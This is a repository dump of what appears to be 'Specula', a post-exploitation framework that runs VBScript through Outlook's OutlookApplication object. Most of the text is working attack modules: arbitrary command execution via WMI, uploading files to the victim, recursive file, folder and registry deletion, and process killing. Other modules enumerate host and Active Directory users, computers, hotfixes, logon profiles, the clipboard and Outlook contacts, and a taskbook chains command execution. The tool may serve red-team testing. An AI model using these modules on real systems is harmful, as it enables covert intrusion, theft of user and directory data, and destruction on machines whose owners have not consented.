window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists({{file}}) = True Then 5 | fs.DeleteFile {{file}} 6 | End If 7 | 8 | If fs.FileExists({{file}}) = True Then 9 | delete_file = delete_file & "Delete file: " & {{file}} & " - Fail" 10 | else 11 | delete_file = delete_file & "Delete file: " & {{file}} & " - Success!" 12 | End If 13 | End Function -------------------------------------------------------------------------------- /lib/handlers/dev_blank.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Outlook 7 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_officearch.txt: -------------------------------------------------------------------------------- 1 | Function list_officearch() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath 6 | if InStr(strPath, "x86") > 0 Then 7 | list_officearch = "x86" 8 | else 9 | list_officearch = "x64" 10 | end if 11 | End Function 12 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_hostsfile.txt: -------------------------------------------------------------------------------- 1 | Function list_hostsfile() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists("C:\Windows\System32\drivers\etc\hosts") = True Then 5 | set ReadFile = fs.OpenTextFile("C:\Windows\System32\drivers\etc\hosts", 1) 6 | content = ReadFile.ReadAll 7 | else 8 | content = "Hosts file not found - WTF!" 9 | End If 10 | list_hostsfile = "C:\Windows\System32\drivers\etc\hosts:" & vbCrLf & content 11 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsarch.txt: -------------------------------------------------------------------------------- 1 | Function list_windowsarch() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE", strArch 6 | if strArch = "AMD64" Then 7 | list_windowsarch = "x64" 8 | else 9 | list_windowsarch = strArch 10 | end if 11 | End Function 12 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_printers.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Uses wscript.network to gather printer connections 10 | 11 | It uses Wscript.Network 12 | - EnumPrinterConnections 13 | """ 14 | self.entry = 'list_printers' 15 | self.depends = [] 16 | super().__init__(templatepath) 17 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_environmentvariables.txt: -------------------------------------------------------------------------------- 1 | Function list_environmentvariables() 2 | On error resume next 3 | list_environmentvariables = list_environmentvariables & GetAllRegValues("HKLM", "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", 64, 2147483650) & vbCrLF & vbCrLF 4 | list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Environment", 64, 2147483649) & vbCrLF & vbCrLF 5 | list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Volatile Environment", 64, 2147483649) & vbCrLF 6 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsversion.txt: -------------------------------------------------------------------------------- 1 | Function list_windowsversion() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ProductName", strProdName 6 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ReleaseId", strRelId 7 | list_windowsversion = strProdName & " - " & strRelId 8 | End Function 9 | -------------------------------------------------------------------------------- /functions/operation/outlook/stop_outlook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This might come as a big shock, but this function stops Outlook. 10 | I know, it is mindblowing. 11 | 12 | It uses OutlookApplication 13 | - Quit() 14 | """ 15 | self.entry = 'Stop_Outlook' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_clipboard.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Creates a html object and retrieved the content from the clipboard 10 | 11 | It uses htmlfile 12 | - ParentWindow.ClipboardData.GetData() 13 | """ 14 | self.entry = 'list_clipboard' 15 | self.depends = [] 16 | super().__init__(templatepath) 17 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_execute.txt: -------------------------------------------------------------------------------- 1 | Function Execute_WMICommand() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set objConfig = objService.Get("Win32_ProcessStartup").SpawnInstance_() 6 | Set objProcess = objService.Get("Win32_Process") 7 | objProcess.Create {{command}}, Null, objConfig, varProcessId 8 | Execute_WMICommand = "Command executed: " & {{command}} & vbCrLf & "Process id new process: " & varProcessId 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_hotfixes.txt: -------------------------------------------------------------------------------- 1 | Function list_hotfixes() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("Select * from Win32_QuickFixEngineering",,48) 6 | list_hotfixes = "HotFixID - Description - InstalledOn" & vbCrLf 7 | For Each objItem in colItems 8 | list_hotfixes = list_hotfixes & objItem.HotFixID & " - " & objItem.Description & " - " & objItem.InstalledOn & vbCrLf 9 | Next 10 | End Function -------------------------------------------------------------------------------- /lib/handlers/specapplication.py: -------------------------------------------------------------------------------- 1 | #we are not able to directly initialize RequestHandler objects for single time initilization actions 2 | #This RequestHandler objects can access anything in the application class via self.application 3 | #Therefore we do shared single initilization here 4 | #validated from top level 5 | import tornado.web 6 | 7 | class speculaApplication(tornado.web.Application): 8 | def __init__(self, helpers, handlers = None, default_host = None, transforms = None, **settings): 9 | self.helpers = helpers 10 | super().__init__(handlers, default_host, transforms, **settings) 11 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_mappeddrives.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the mapped drives on the host. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name,ProviderName from Win32_MappedLogicalDisk 14 | """ 15 | self.entry = 'list_mappeddrives' 16 | self.depends = [] 17 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_services.txt: -------------------------------------------------------------------------------- 1 | Function list_services() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select * from Win32_Service") 6 | 7 | For Each objService in col 8 | services = services & vbCrLf & objService.Name & vbCrLf & " State:" & objService.State & vbCrLf & " Name: " & objService.StartName & vbCrLf & " BinPath:" & objService.PathName 9 | Next 10 | list_services = services 11 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_startmenu.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Lists the structure and items in the start menu. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name from Win32_LogicalProgramGroupItem 14 | """ 15 | self.entry = 'list_startmenu' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /api/SpeculaApi/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by SpeculaApi.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_SPECULAAPI 101 7 | #define IDR_SEPCULA 106 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 107 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /helperFunctions/Delregkey_hkcu.txt: -------------------------------------------------------------------------------- 1 | Function DelRegKey_HKCU(PathToKey) 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | objreg.EnumKey 2147483649, PathToKey, arrSubkeys 7 | If IsArray(arrSubkeys) Then 8 | For Each strSubkey In arrSubkeys 9 | DelRegKey_HKCU(PathToKey & "\" & strSubkey) 10 | Next 11 | End If 12 | objreg.DeleteKey 2147483649, PathToKey 13 | DelRegKey_HKCU = "Regkey : HKCU\\" & PathToKey & " Deleted recursive" 14 | End Function 15 | -------------------------------------------------------------------------------- /api/SpeculaApi/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_mappeddrives.txt: -------------------------------------------------------------------------------- 1 | Function list_mappeddrives() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProviderName from Win32_MappedLogicalDisk") 6 | 7 | drives = "Letter - Provider" & vbCrLf 8 | For Each obj in col 9 | drives = drives & obj.Name & " - " & obj.ProviderName & vbCrLf 10 | Next 11 | list_mappeddrives = drives 12 | End Function -------------------------------------------------------------------------------- /functions/operation/file/create_shortcut.txt: -------------------------------------------------------------------------------- 1 | Function create_shortcut() 2 | On error resume next 3 | Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 4 | Set lnk = objShell.CreateShortcut({{file}}) 5 | lnk.TargetPath = {{targetpath}} 6 | lnk.Arguments = {{arguments}} 7 | lnk.Description = {{description}} 8 | lnk.HotKey = {{hotkey}} 9 | lnk.IconLocation = {{iconlocation}} 10 | lnk.WindowStyle = {{windowstyle_int}} 11 | lnk.WorkingDirectory = {{workingdirectory}} 12 | lnk.Save 13 | create_shortcut = "Shortcut created at " & {{file}} 14 | End Function -------------------------------------------------------------------------------- /functions/operation/file/delete_dir.txt: -------------------------------------------------------------------------------- 1 | Function delete_dir() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | 5 | if fs.FolderExists({{directory}}) = True Then 6 | fs.DeleteFolder {{directory}}, True 7 | If fs.FolderExists({{directory}}) = False Then 8 | delete_dir = "Delete directory: " & {{directory}} & " - Success" 9 | else 10 | delete_dir = "Delete directory: " & {{directory}} & " - Failed" 11 | End If 12 | else 13 | delete_dir = {{directory}} & " - Directory not found" 14 | End if 15 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_scheduledtasks.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the scheduled tasks on the host. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(ROOT\Microsoft\Windows\TaskScheduler) 13 | - Query: SELECT * FROM MSFT_ScheduledTask 14 | """ 15 | self.entry = 'list_scheduledtasks' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_networkcardinfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all the information from the network cards. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: SELECT * FROM Win32_NetworkAdapterConfiguration 14 | """ 15 | self.entry = 'list_networkcardinfo' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/operation/network/nslookup.txt: -------------------------------------------------------------------------------- 1 | function nslookup() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 4 | 5 | Set colPings = objWMIService.ExecQuery("SELECT * FROM Win32_PingStatus WHERE Address = '" & {{hostname}} & "'") 6 | 7 | For Each objPing in colPings 8 | If objPing.StatusCode = 0 Then 9 | nslookup = "Hostname: " & {{hostname}} & " = " & objPing.ProtocolAddress 10 | Else 11 | nslookup = "Failed to resolve: " & {{hostname}} 12 | End If 13 | Next 14 | end function -------------------------------------------------------------------------------- /hiddenFunctions/upload_file.txt: -------------------------------------------------------------------------------- 1 | Function upload_file() 2 | on error resume next 3 | Set fso = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Const ForAppending = 8 5 | Set File = fso.OpenTextFile({{destination}}, ForAppending, True) 6 | If Err.Number <> 0 Then 7 | upload_file = "ERROR: " & Err.Description 8 | Err.Clear 9 | exit function 10 | End if 11 | data = {{data}} 12 | start = 1 13 | loopnumber = len(data)/2 14 | For i = 1 To loopnumber 15 | File.write chr("&H" & mid(data,start,2)) 16 | start = start + 2 17 | Next 18 | File.Close 19 | upload_file = "Chunk uploaded successfully" 20 | End Function -------------------------------------------------------------------------------- /functions/operation/file/copy_file.txt: -------------------------------------------------------------------------------- 1 | Function copy_file() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | 5 | if fs.FileExists({{file}}) = True Then 6 | fs.CopyFile {{file}}, {{destination}} 7 | 8 | If fs.FileExists({{destination}}) = True Then 9 | copy_file = "Copy file: " & {{file}} & " to " & {{destination}} & " - Success" 10 | else 11 | copy_file = "Copy file: " & {{file}} & " to " & {{destination}} & " - Failed" 12 | End If 13 | else 14 | copy_file = {{file}} & " - File not found" 15 | End if 16 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_boottime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates last boot time using WMI. 10 | It queries LastBootUpTime from Win32_OperatingSystem and converts it to a readable format. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - Query: Select LastBootUpTime from Win32_OperatingSystem 14 | """ 15 | self.entry = 'list_boottime' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocpid.txt: -------------------------------------------------------------------------------- 1 | Function KillProc_PID() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId from Win32_Process Where ProcessID = '" & {{pid}} & "'") 6 | 7 | procs = "Processname - PID - PPID" & vbCrLf 8 | For Each obj in col 9 | procs = procs & "Killed process: " & obj.Name & " - " & obj.ProcessId & " - " & obj.ParentProcessId & vbCrLf 10 | obj.Terminate() 11 | Next 12 | KillProc_PID = procs 13 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computers.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all computers from Active Directory. 10 | It returns the sAMAccountName 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_sAMAccountName FROM ds_computer 15 | """ 16 | self.entry = 'list_computers' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocname.txt: -------------------------------------------------------------------------------- 1 | Function KillProc_Name() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId from Win32_Process Where Name = '" & {{process}} & "'") 6 | 7 | procs = "Processname - PID - PPID" & vbCrLf 8 | For Each obj in col 9 | procs = procs & "Killed process: " & obj.Name & " - " & obj.ProcessId & " - " & obj.ParentProcessId & vbCrLf 10 | obj.Terminate() 11 | Next 12 | KillProc_Name = procs 13 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_contacts.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | This module allows you to read the contacts items. 9 | Distribution groups are not implemented yet. 10 | 11 | It uses OutlookApplication 12 | - GetNameSpace("MAPI").GetDefaultFolder(10) 13 | - GetNameSpace("MAPI").GetDefaultFolder(10).items 14 | """ 15 | self.entry = 'read_contacts' 16 | self.depends = [] 17 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/handlers/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Outlook 6 | 14 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_ntdomaininfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates information about the domain the computer is joined to using WMI. 10 | Returns unknown if computer is in workgroup. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: Select * from Win32_NTDomain 15 | """ 16 | self.entry = 'list_ntdomaininfo' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_domaininfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates Top level information from the specified domain in the Domain option. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(\\root\\directory\\LDAP) 13 | - Query: SELECT * FROM ds_domaindns 14 | """ 15 | self.entry = 'list_domaininfo' 16 | self.depends = [] 17 | 18 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/copy_dir.txt: -------------------------------------------------------------------------------- 1 | Function copy_dir() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FolderExists({{destination}}) = True Then 5 | copy_dir = "Destination directory already exists - Failed" 6 | else 7 | fs.CopyFolder {{directory}}, {{destination}} 8 | if fs.FolderExists({{destination}}) = True Then 9 | copy_dir = "Copy directory: " & {{directory}} & " to " & {{destination}} & " - Success" 10 | else 11 | copy_dir = "Copy directory: " & {{directory}} & " to " & {{destination}} & " - Failed" 12 | End If 13 | End if 14 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_users.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory. 11 | It returns the sAMAccountName 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_sAMAccountName FROM ds_user 16 | """ 17 | self.entry = 'list_users' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_hotfixes.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Using WMI it enumerates the installed hotfixes. 10 | The Win32_QuickFixEngineering is used (Same as the Powershell cmdlet get-hotfix) 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: Select * from Win32_QuickFixEngineering 15 | """ 16 | self.entry = 'list_hotfixes' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recyclebin.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module reads lists the content of the recycle bin 10 | for the current user. To download a file use get_file and 11 | use the long path in the output from this module. 12 | 13 | It uses CreateObject("Shell.Application") 14 | """ 15 | self.entry = 'list_recyclebin' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedpowershell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the current installed PowerShell versions on the host using registry. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).EnumKey 14 | - ConnectServer(root\cimv2).GetStringValue 15 | """ 16 | self.entry = 'list_installedpowershell' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /api/SpeculaApi/Sepcula.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | SpeculaApi.Specula.1 = s 'Specula class' 4 | { 5 | CLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}' 6 | } 7 | SpeculaApi.Specula = s 'Specula class' 8 | { 9 | CurVer = s 'SpeculaApi.Specula.1' 10 | } 11 | NoRemove CLSID 12 | { 13 | ForceRemove {e8b55279-c6b4-48f3-8138-b727337c0236} = s 'Specula class' 14 | { 15 | ProgID = s 'SpeculaApi.Specula.1' 16 | VersionIndependentProgID = s 'SpeculaApi.Specula' 17 | ForceRemove Programmable 18 | InprocServer32 = s '%MODULE%' 19 | { 20 | val ThreadingModel = s 'Free' 21 | } 22 | TypeLib = s '{5be8ef76-6253-482a-926e-d1d877de3b63}' 23 | Version = s '1.0' 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_localusers.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the local users on the current host 10 | 11 | It uses CreateObject("Wscript.Shell") 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: "SELECT * FROM Win32_UserAccount WHERE LocalAccount = True" 15 | """ 16 | self.entry = 'list_localusers' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentfiles.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all shortcuts in the MY_RECENT_DOCUMENTS / RECENT_FILES 10 | Resolved all shortcuts to the items and lists them out 11 | 12 | It uses WScript.Shell 13 | - CreateShortcut 14 | 15 | It uses Shell.Application 16 | - Namespace 17 | - Namespace().items 18 | """ 19 | self.entry = 'list_recentfiles' 20 | self.depends = [] 21 | super().__init__(templatepath) 22 | -------------------------------------------------------------------------------- /lib/modhandlers/generic.py: -------------------------------------------------------------------------------- 1 | from lib.core import helpers 2 | def quotedstring(value, **kwargs): 3 | if value[0] != "\"": 4 | return '"{}"'.format(value) 5 | return value 6 | 7 | def escapebackslash(value, **kwargs): 8 | if "\\" in value: 9 | return value.replace("\\", "\\\\") 10 | return value 11 | 12 | def makeint(value, **kwargs): 13 | return int(value) 14 | 15 | def makelist(value, **kwargs): 16 | args = helpers.Helpers.getarguments(value) 17 | return args 18 | 19 | def escapequotes(value, **kwargs): 20 | return value.replace('"', '""').replace("\\", "\\\\") 21 | 22 | def makebool(value, **kwargs): 23 | if value.lower() == 'true': 24 | return True 25 | else: 26 | return False -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentfiles.txt: -------------------------------------------------------------------------------- 1 | Function list_recentfiles() 2 | On error resume next 3 | Const MY_RECENT_DOCUMENTS = &H8& 4 | recentpaths = "RECENT PATHS:" & vbCrLf 5 | set WshShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 6 | Set objShell = window.external.OutlookApplication.CreateObject("Shell.Application") 7 | Set objFolder = objShell.Namespace(MY_RECENT_DOCUMENTS) 8 | Set colItems = objFolder.Items 9 | For Each objItem in colItems 10 | Set oShellLink = WshShell.CreateShortcut(objItem.path) 11 | if Len(oShellLink.TargetPath) = 0 then 12 | else 13 | recentpaths = recentpaths & oShellLink.TargetPath & vbCrLf 14 | end if 15 | Next 16 | list_recentfiles = recentpaths 17 | End Function -------------------------------------------------------------------------------- /Taskbooks/example.py: -------------------------------------------------------------------------------- 1 | def TaskBook(helpers, agent): 2 | mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take arguments, so we aren't giving it any 3 | helpers.insertTask(agent, mod, 'enumerate/host/list_applocker') 4 | mod = helpers.get_module('execute/host/cmd') # this does take an argument so we need to populate it 5 | helpers.setModOption(mod, 'command', prompt="What command would you like to run: ") 6 | helpers.insertTask(agent, mod, 'execute/host/cmd') 7 | #we don't have to prompt for the input though 8 | mod = helpers.get_module('operation/file/listdir') 9 | helpers.setModOption(mod, 'strpath', optval="C:\Windows") 10 | helpers.insertTask(agent, mod, 'operation/file/listdir') 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_networklogon.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all the information from the Network login profile. 10 | Contains interesting information such as logon restrictions, logon scripts, number of logons and password age 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: SELECT * FROM Win32_NetworkLoginProfile 15 | """ 16 | self.entry = 'list_networklogon' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/operation/outlook/get_emailaddress.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | Gets the current users email address based of the top level folder name in Outlook 12 | 13 | It uses OutlookApplication 14 | - GetNameSpace("MAPI").Folders(1).Folderpath 15 | """ 16 | self.entry = 'get_emailaddress' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_hostsfile.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module reads the content of the hostsfile under 10 | 